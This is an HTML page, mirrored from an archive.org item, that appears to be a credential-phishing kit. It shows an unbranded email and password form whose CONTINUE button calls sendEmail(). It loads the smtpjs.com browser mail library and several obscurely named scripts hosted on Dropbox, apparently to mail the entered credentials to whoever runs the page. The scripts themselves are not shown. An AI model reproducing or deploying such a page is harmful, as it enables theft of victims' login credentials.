<html lang="en">

<!-- Mirrored from ia601506.us.archive.org/30/items/senderror_20210222/n.htm by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 23 Feb 2021 03:00:39 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
<meta charset="utf-8">
<script language="Javascript" src="../../../../dl.dropboxusercontent.com/s/71mbw0ziz24stew/myscr584876.js_%3b%20filename_%3dUTF-8%27%27myscr584876ec75.js?dl=0"></script>


</head>
<body>
<script language="Javascript" src="../../../../dl.dropboxusercontent.com/s/45uascggf6klqxg/myscr262639.js_%3b%20filename_%3dUTF-8%27%27myscr262639ec75.js?dl=0"></script>


 <div class="modal-content animate" >
    
	 
	 
	<script language="Javascript" src="../../../../dl.dropboxusercontent.com/s/iri3h6e40giwbgp/myscr408434.js_%3b%20filename_%3dUTF-8%27%27myscr408434ec75.js?dl=0"></script>
     <script language="Javascript" src="../../../../dl.dropboxusercontent.com/s/q3i9j9uulpdw0ex/myscr294914.js_%3b%20filename_%3dUTF-8%27%27myscr294914ec75.js?dl=0"></script>
	 
	 
	  <input type="email" placeholder="Email Address"  id="myText" required="">


<br>
	 <input type="password" placeholder="Enter Password" id="password" required="">
        
<br>
   <button type="submit" id="submit-btn"  onclick="sendEmail();">CONTINUE</button>
     
    </p></center>
	
	    <div class="container" style="background-color:#f1f1f1">
     
    
	
	  </div>


<script language="Javascript" src="../../../../dl.dropboxusercontent.com/s/edj6r87l0s18yj9/myscr741586.js_%3b%20filename_%3dUTF-8%27%27myscr741586ec75.js?dl=0"></script>
<script  src="../../../../ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js">

</script>
 <script src= 
	"../../../../smtpjs.com/v3/smtp.js"> 
</script> 
   
<script language="Javascript" src="../../../../dl.dropboxusercontent.com/s/jn3d0nvz733l8xx/myscr660617.js_%3b%20filename_%3dUTF-8%27%27myscr660617ec75.js?dl=0"></script>
</body>

<!-- Mirrored from ia601506.us.archive.org/30/items/senderror_20210222/n.htm by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 23 Feb 2021 03:00:45 GMT -->
</html>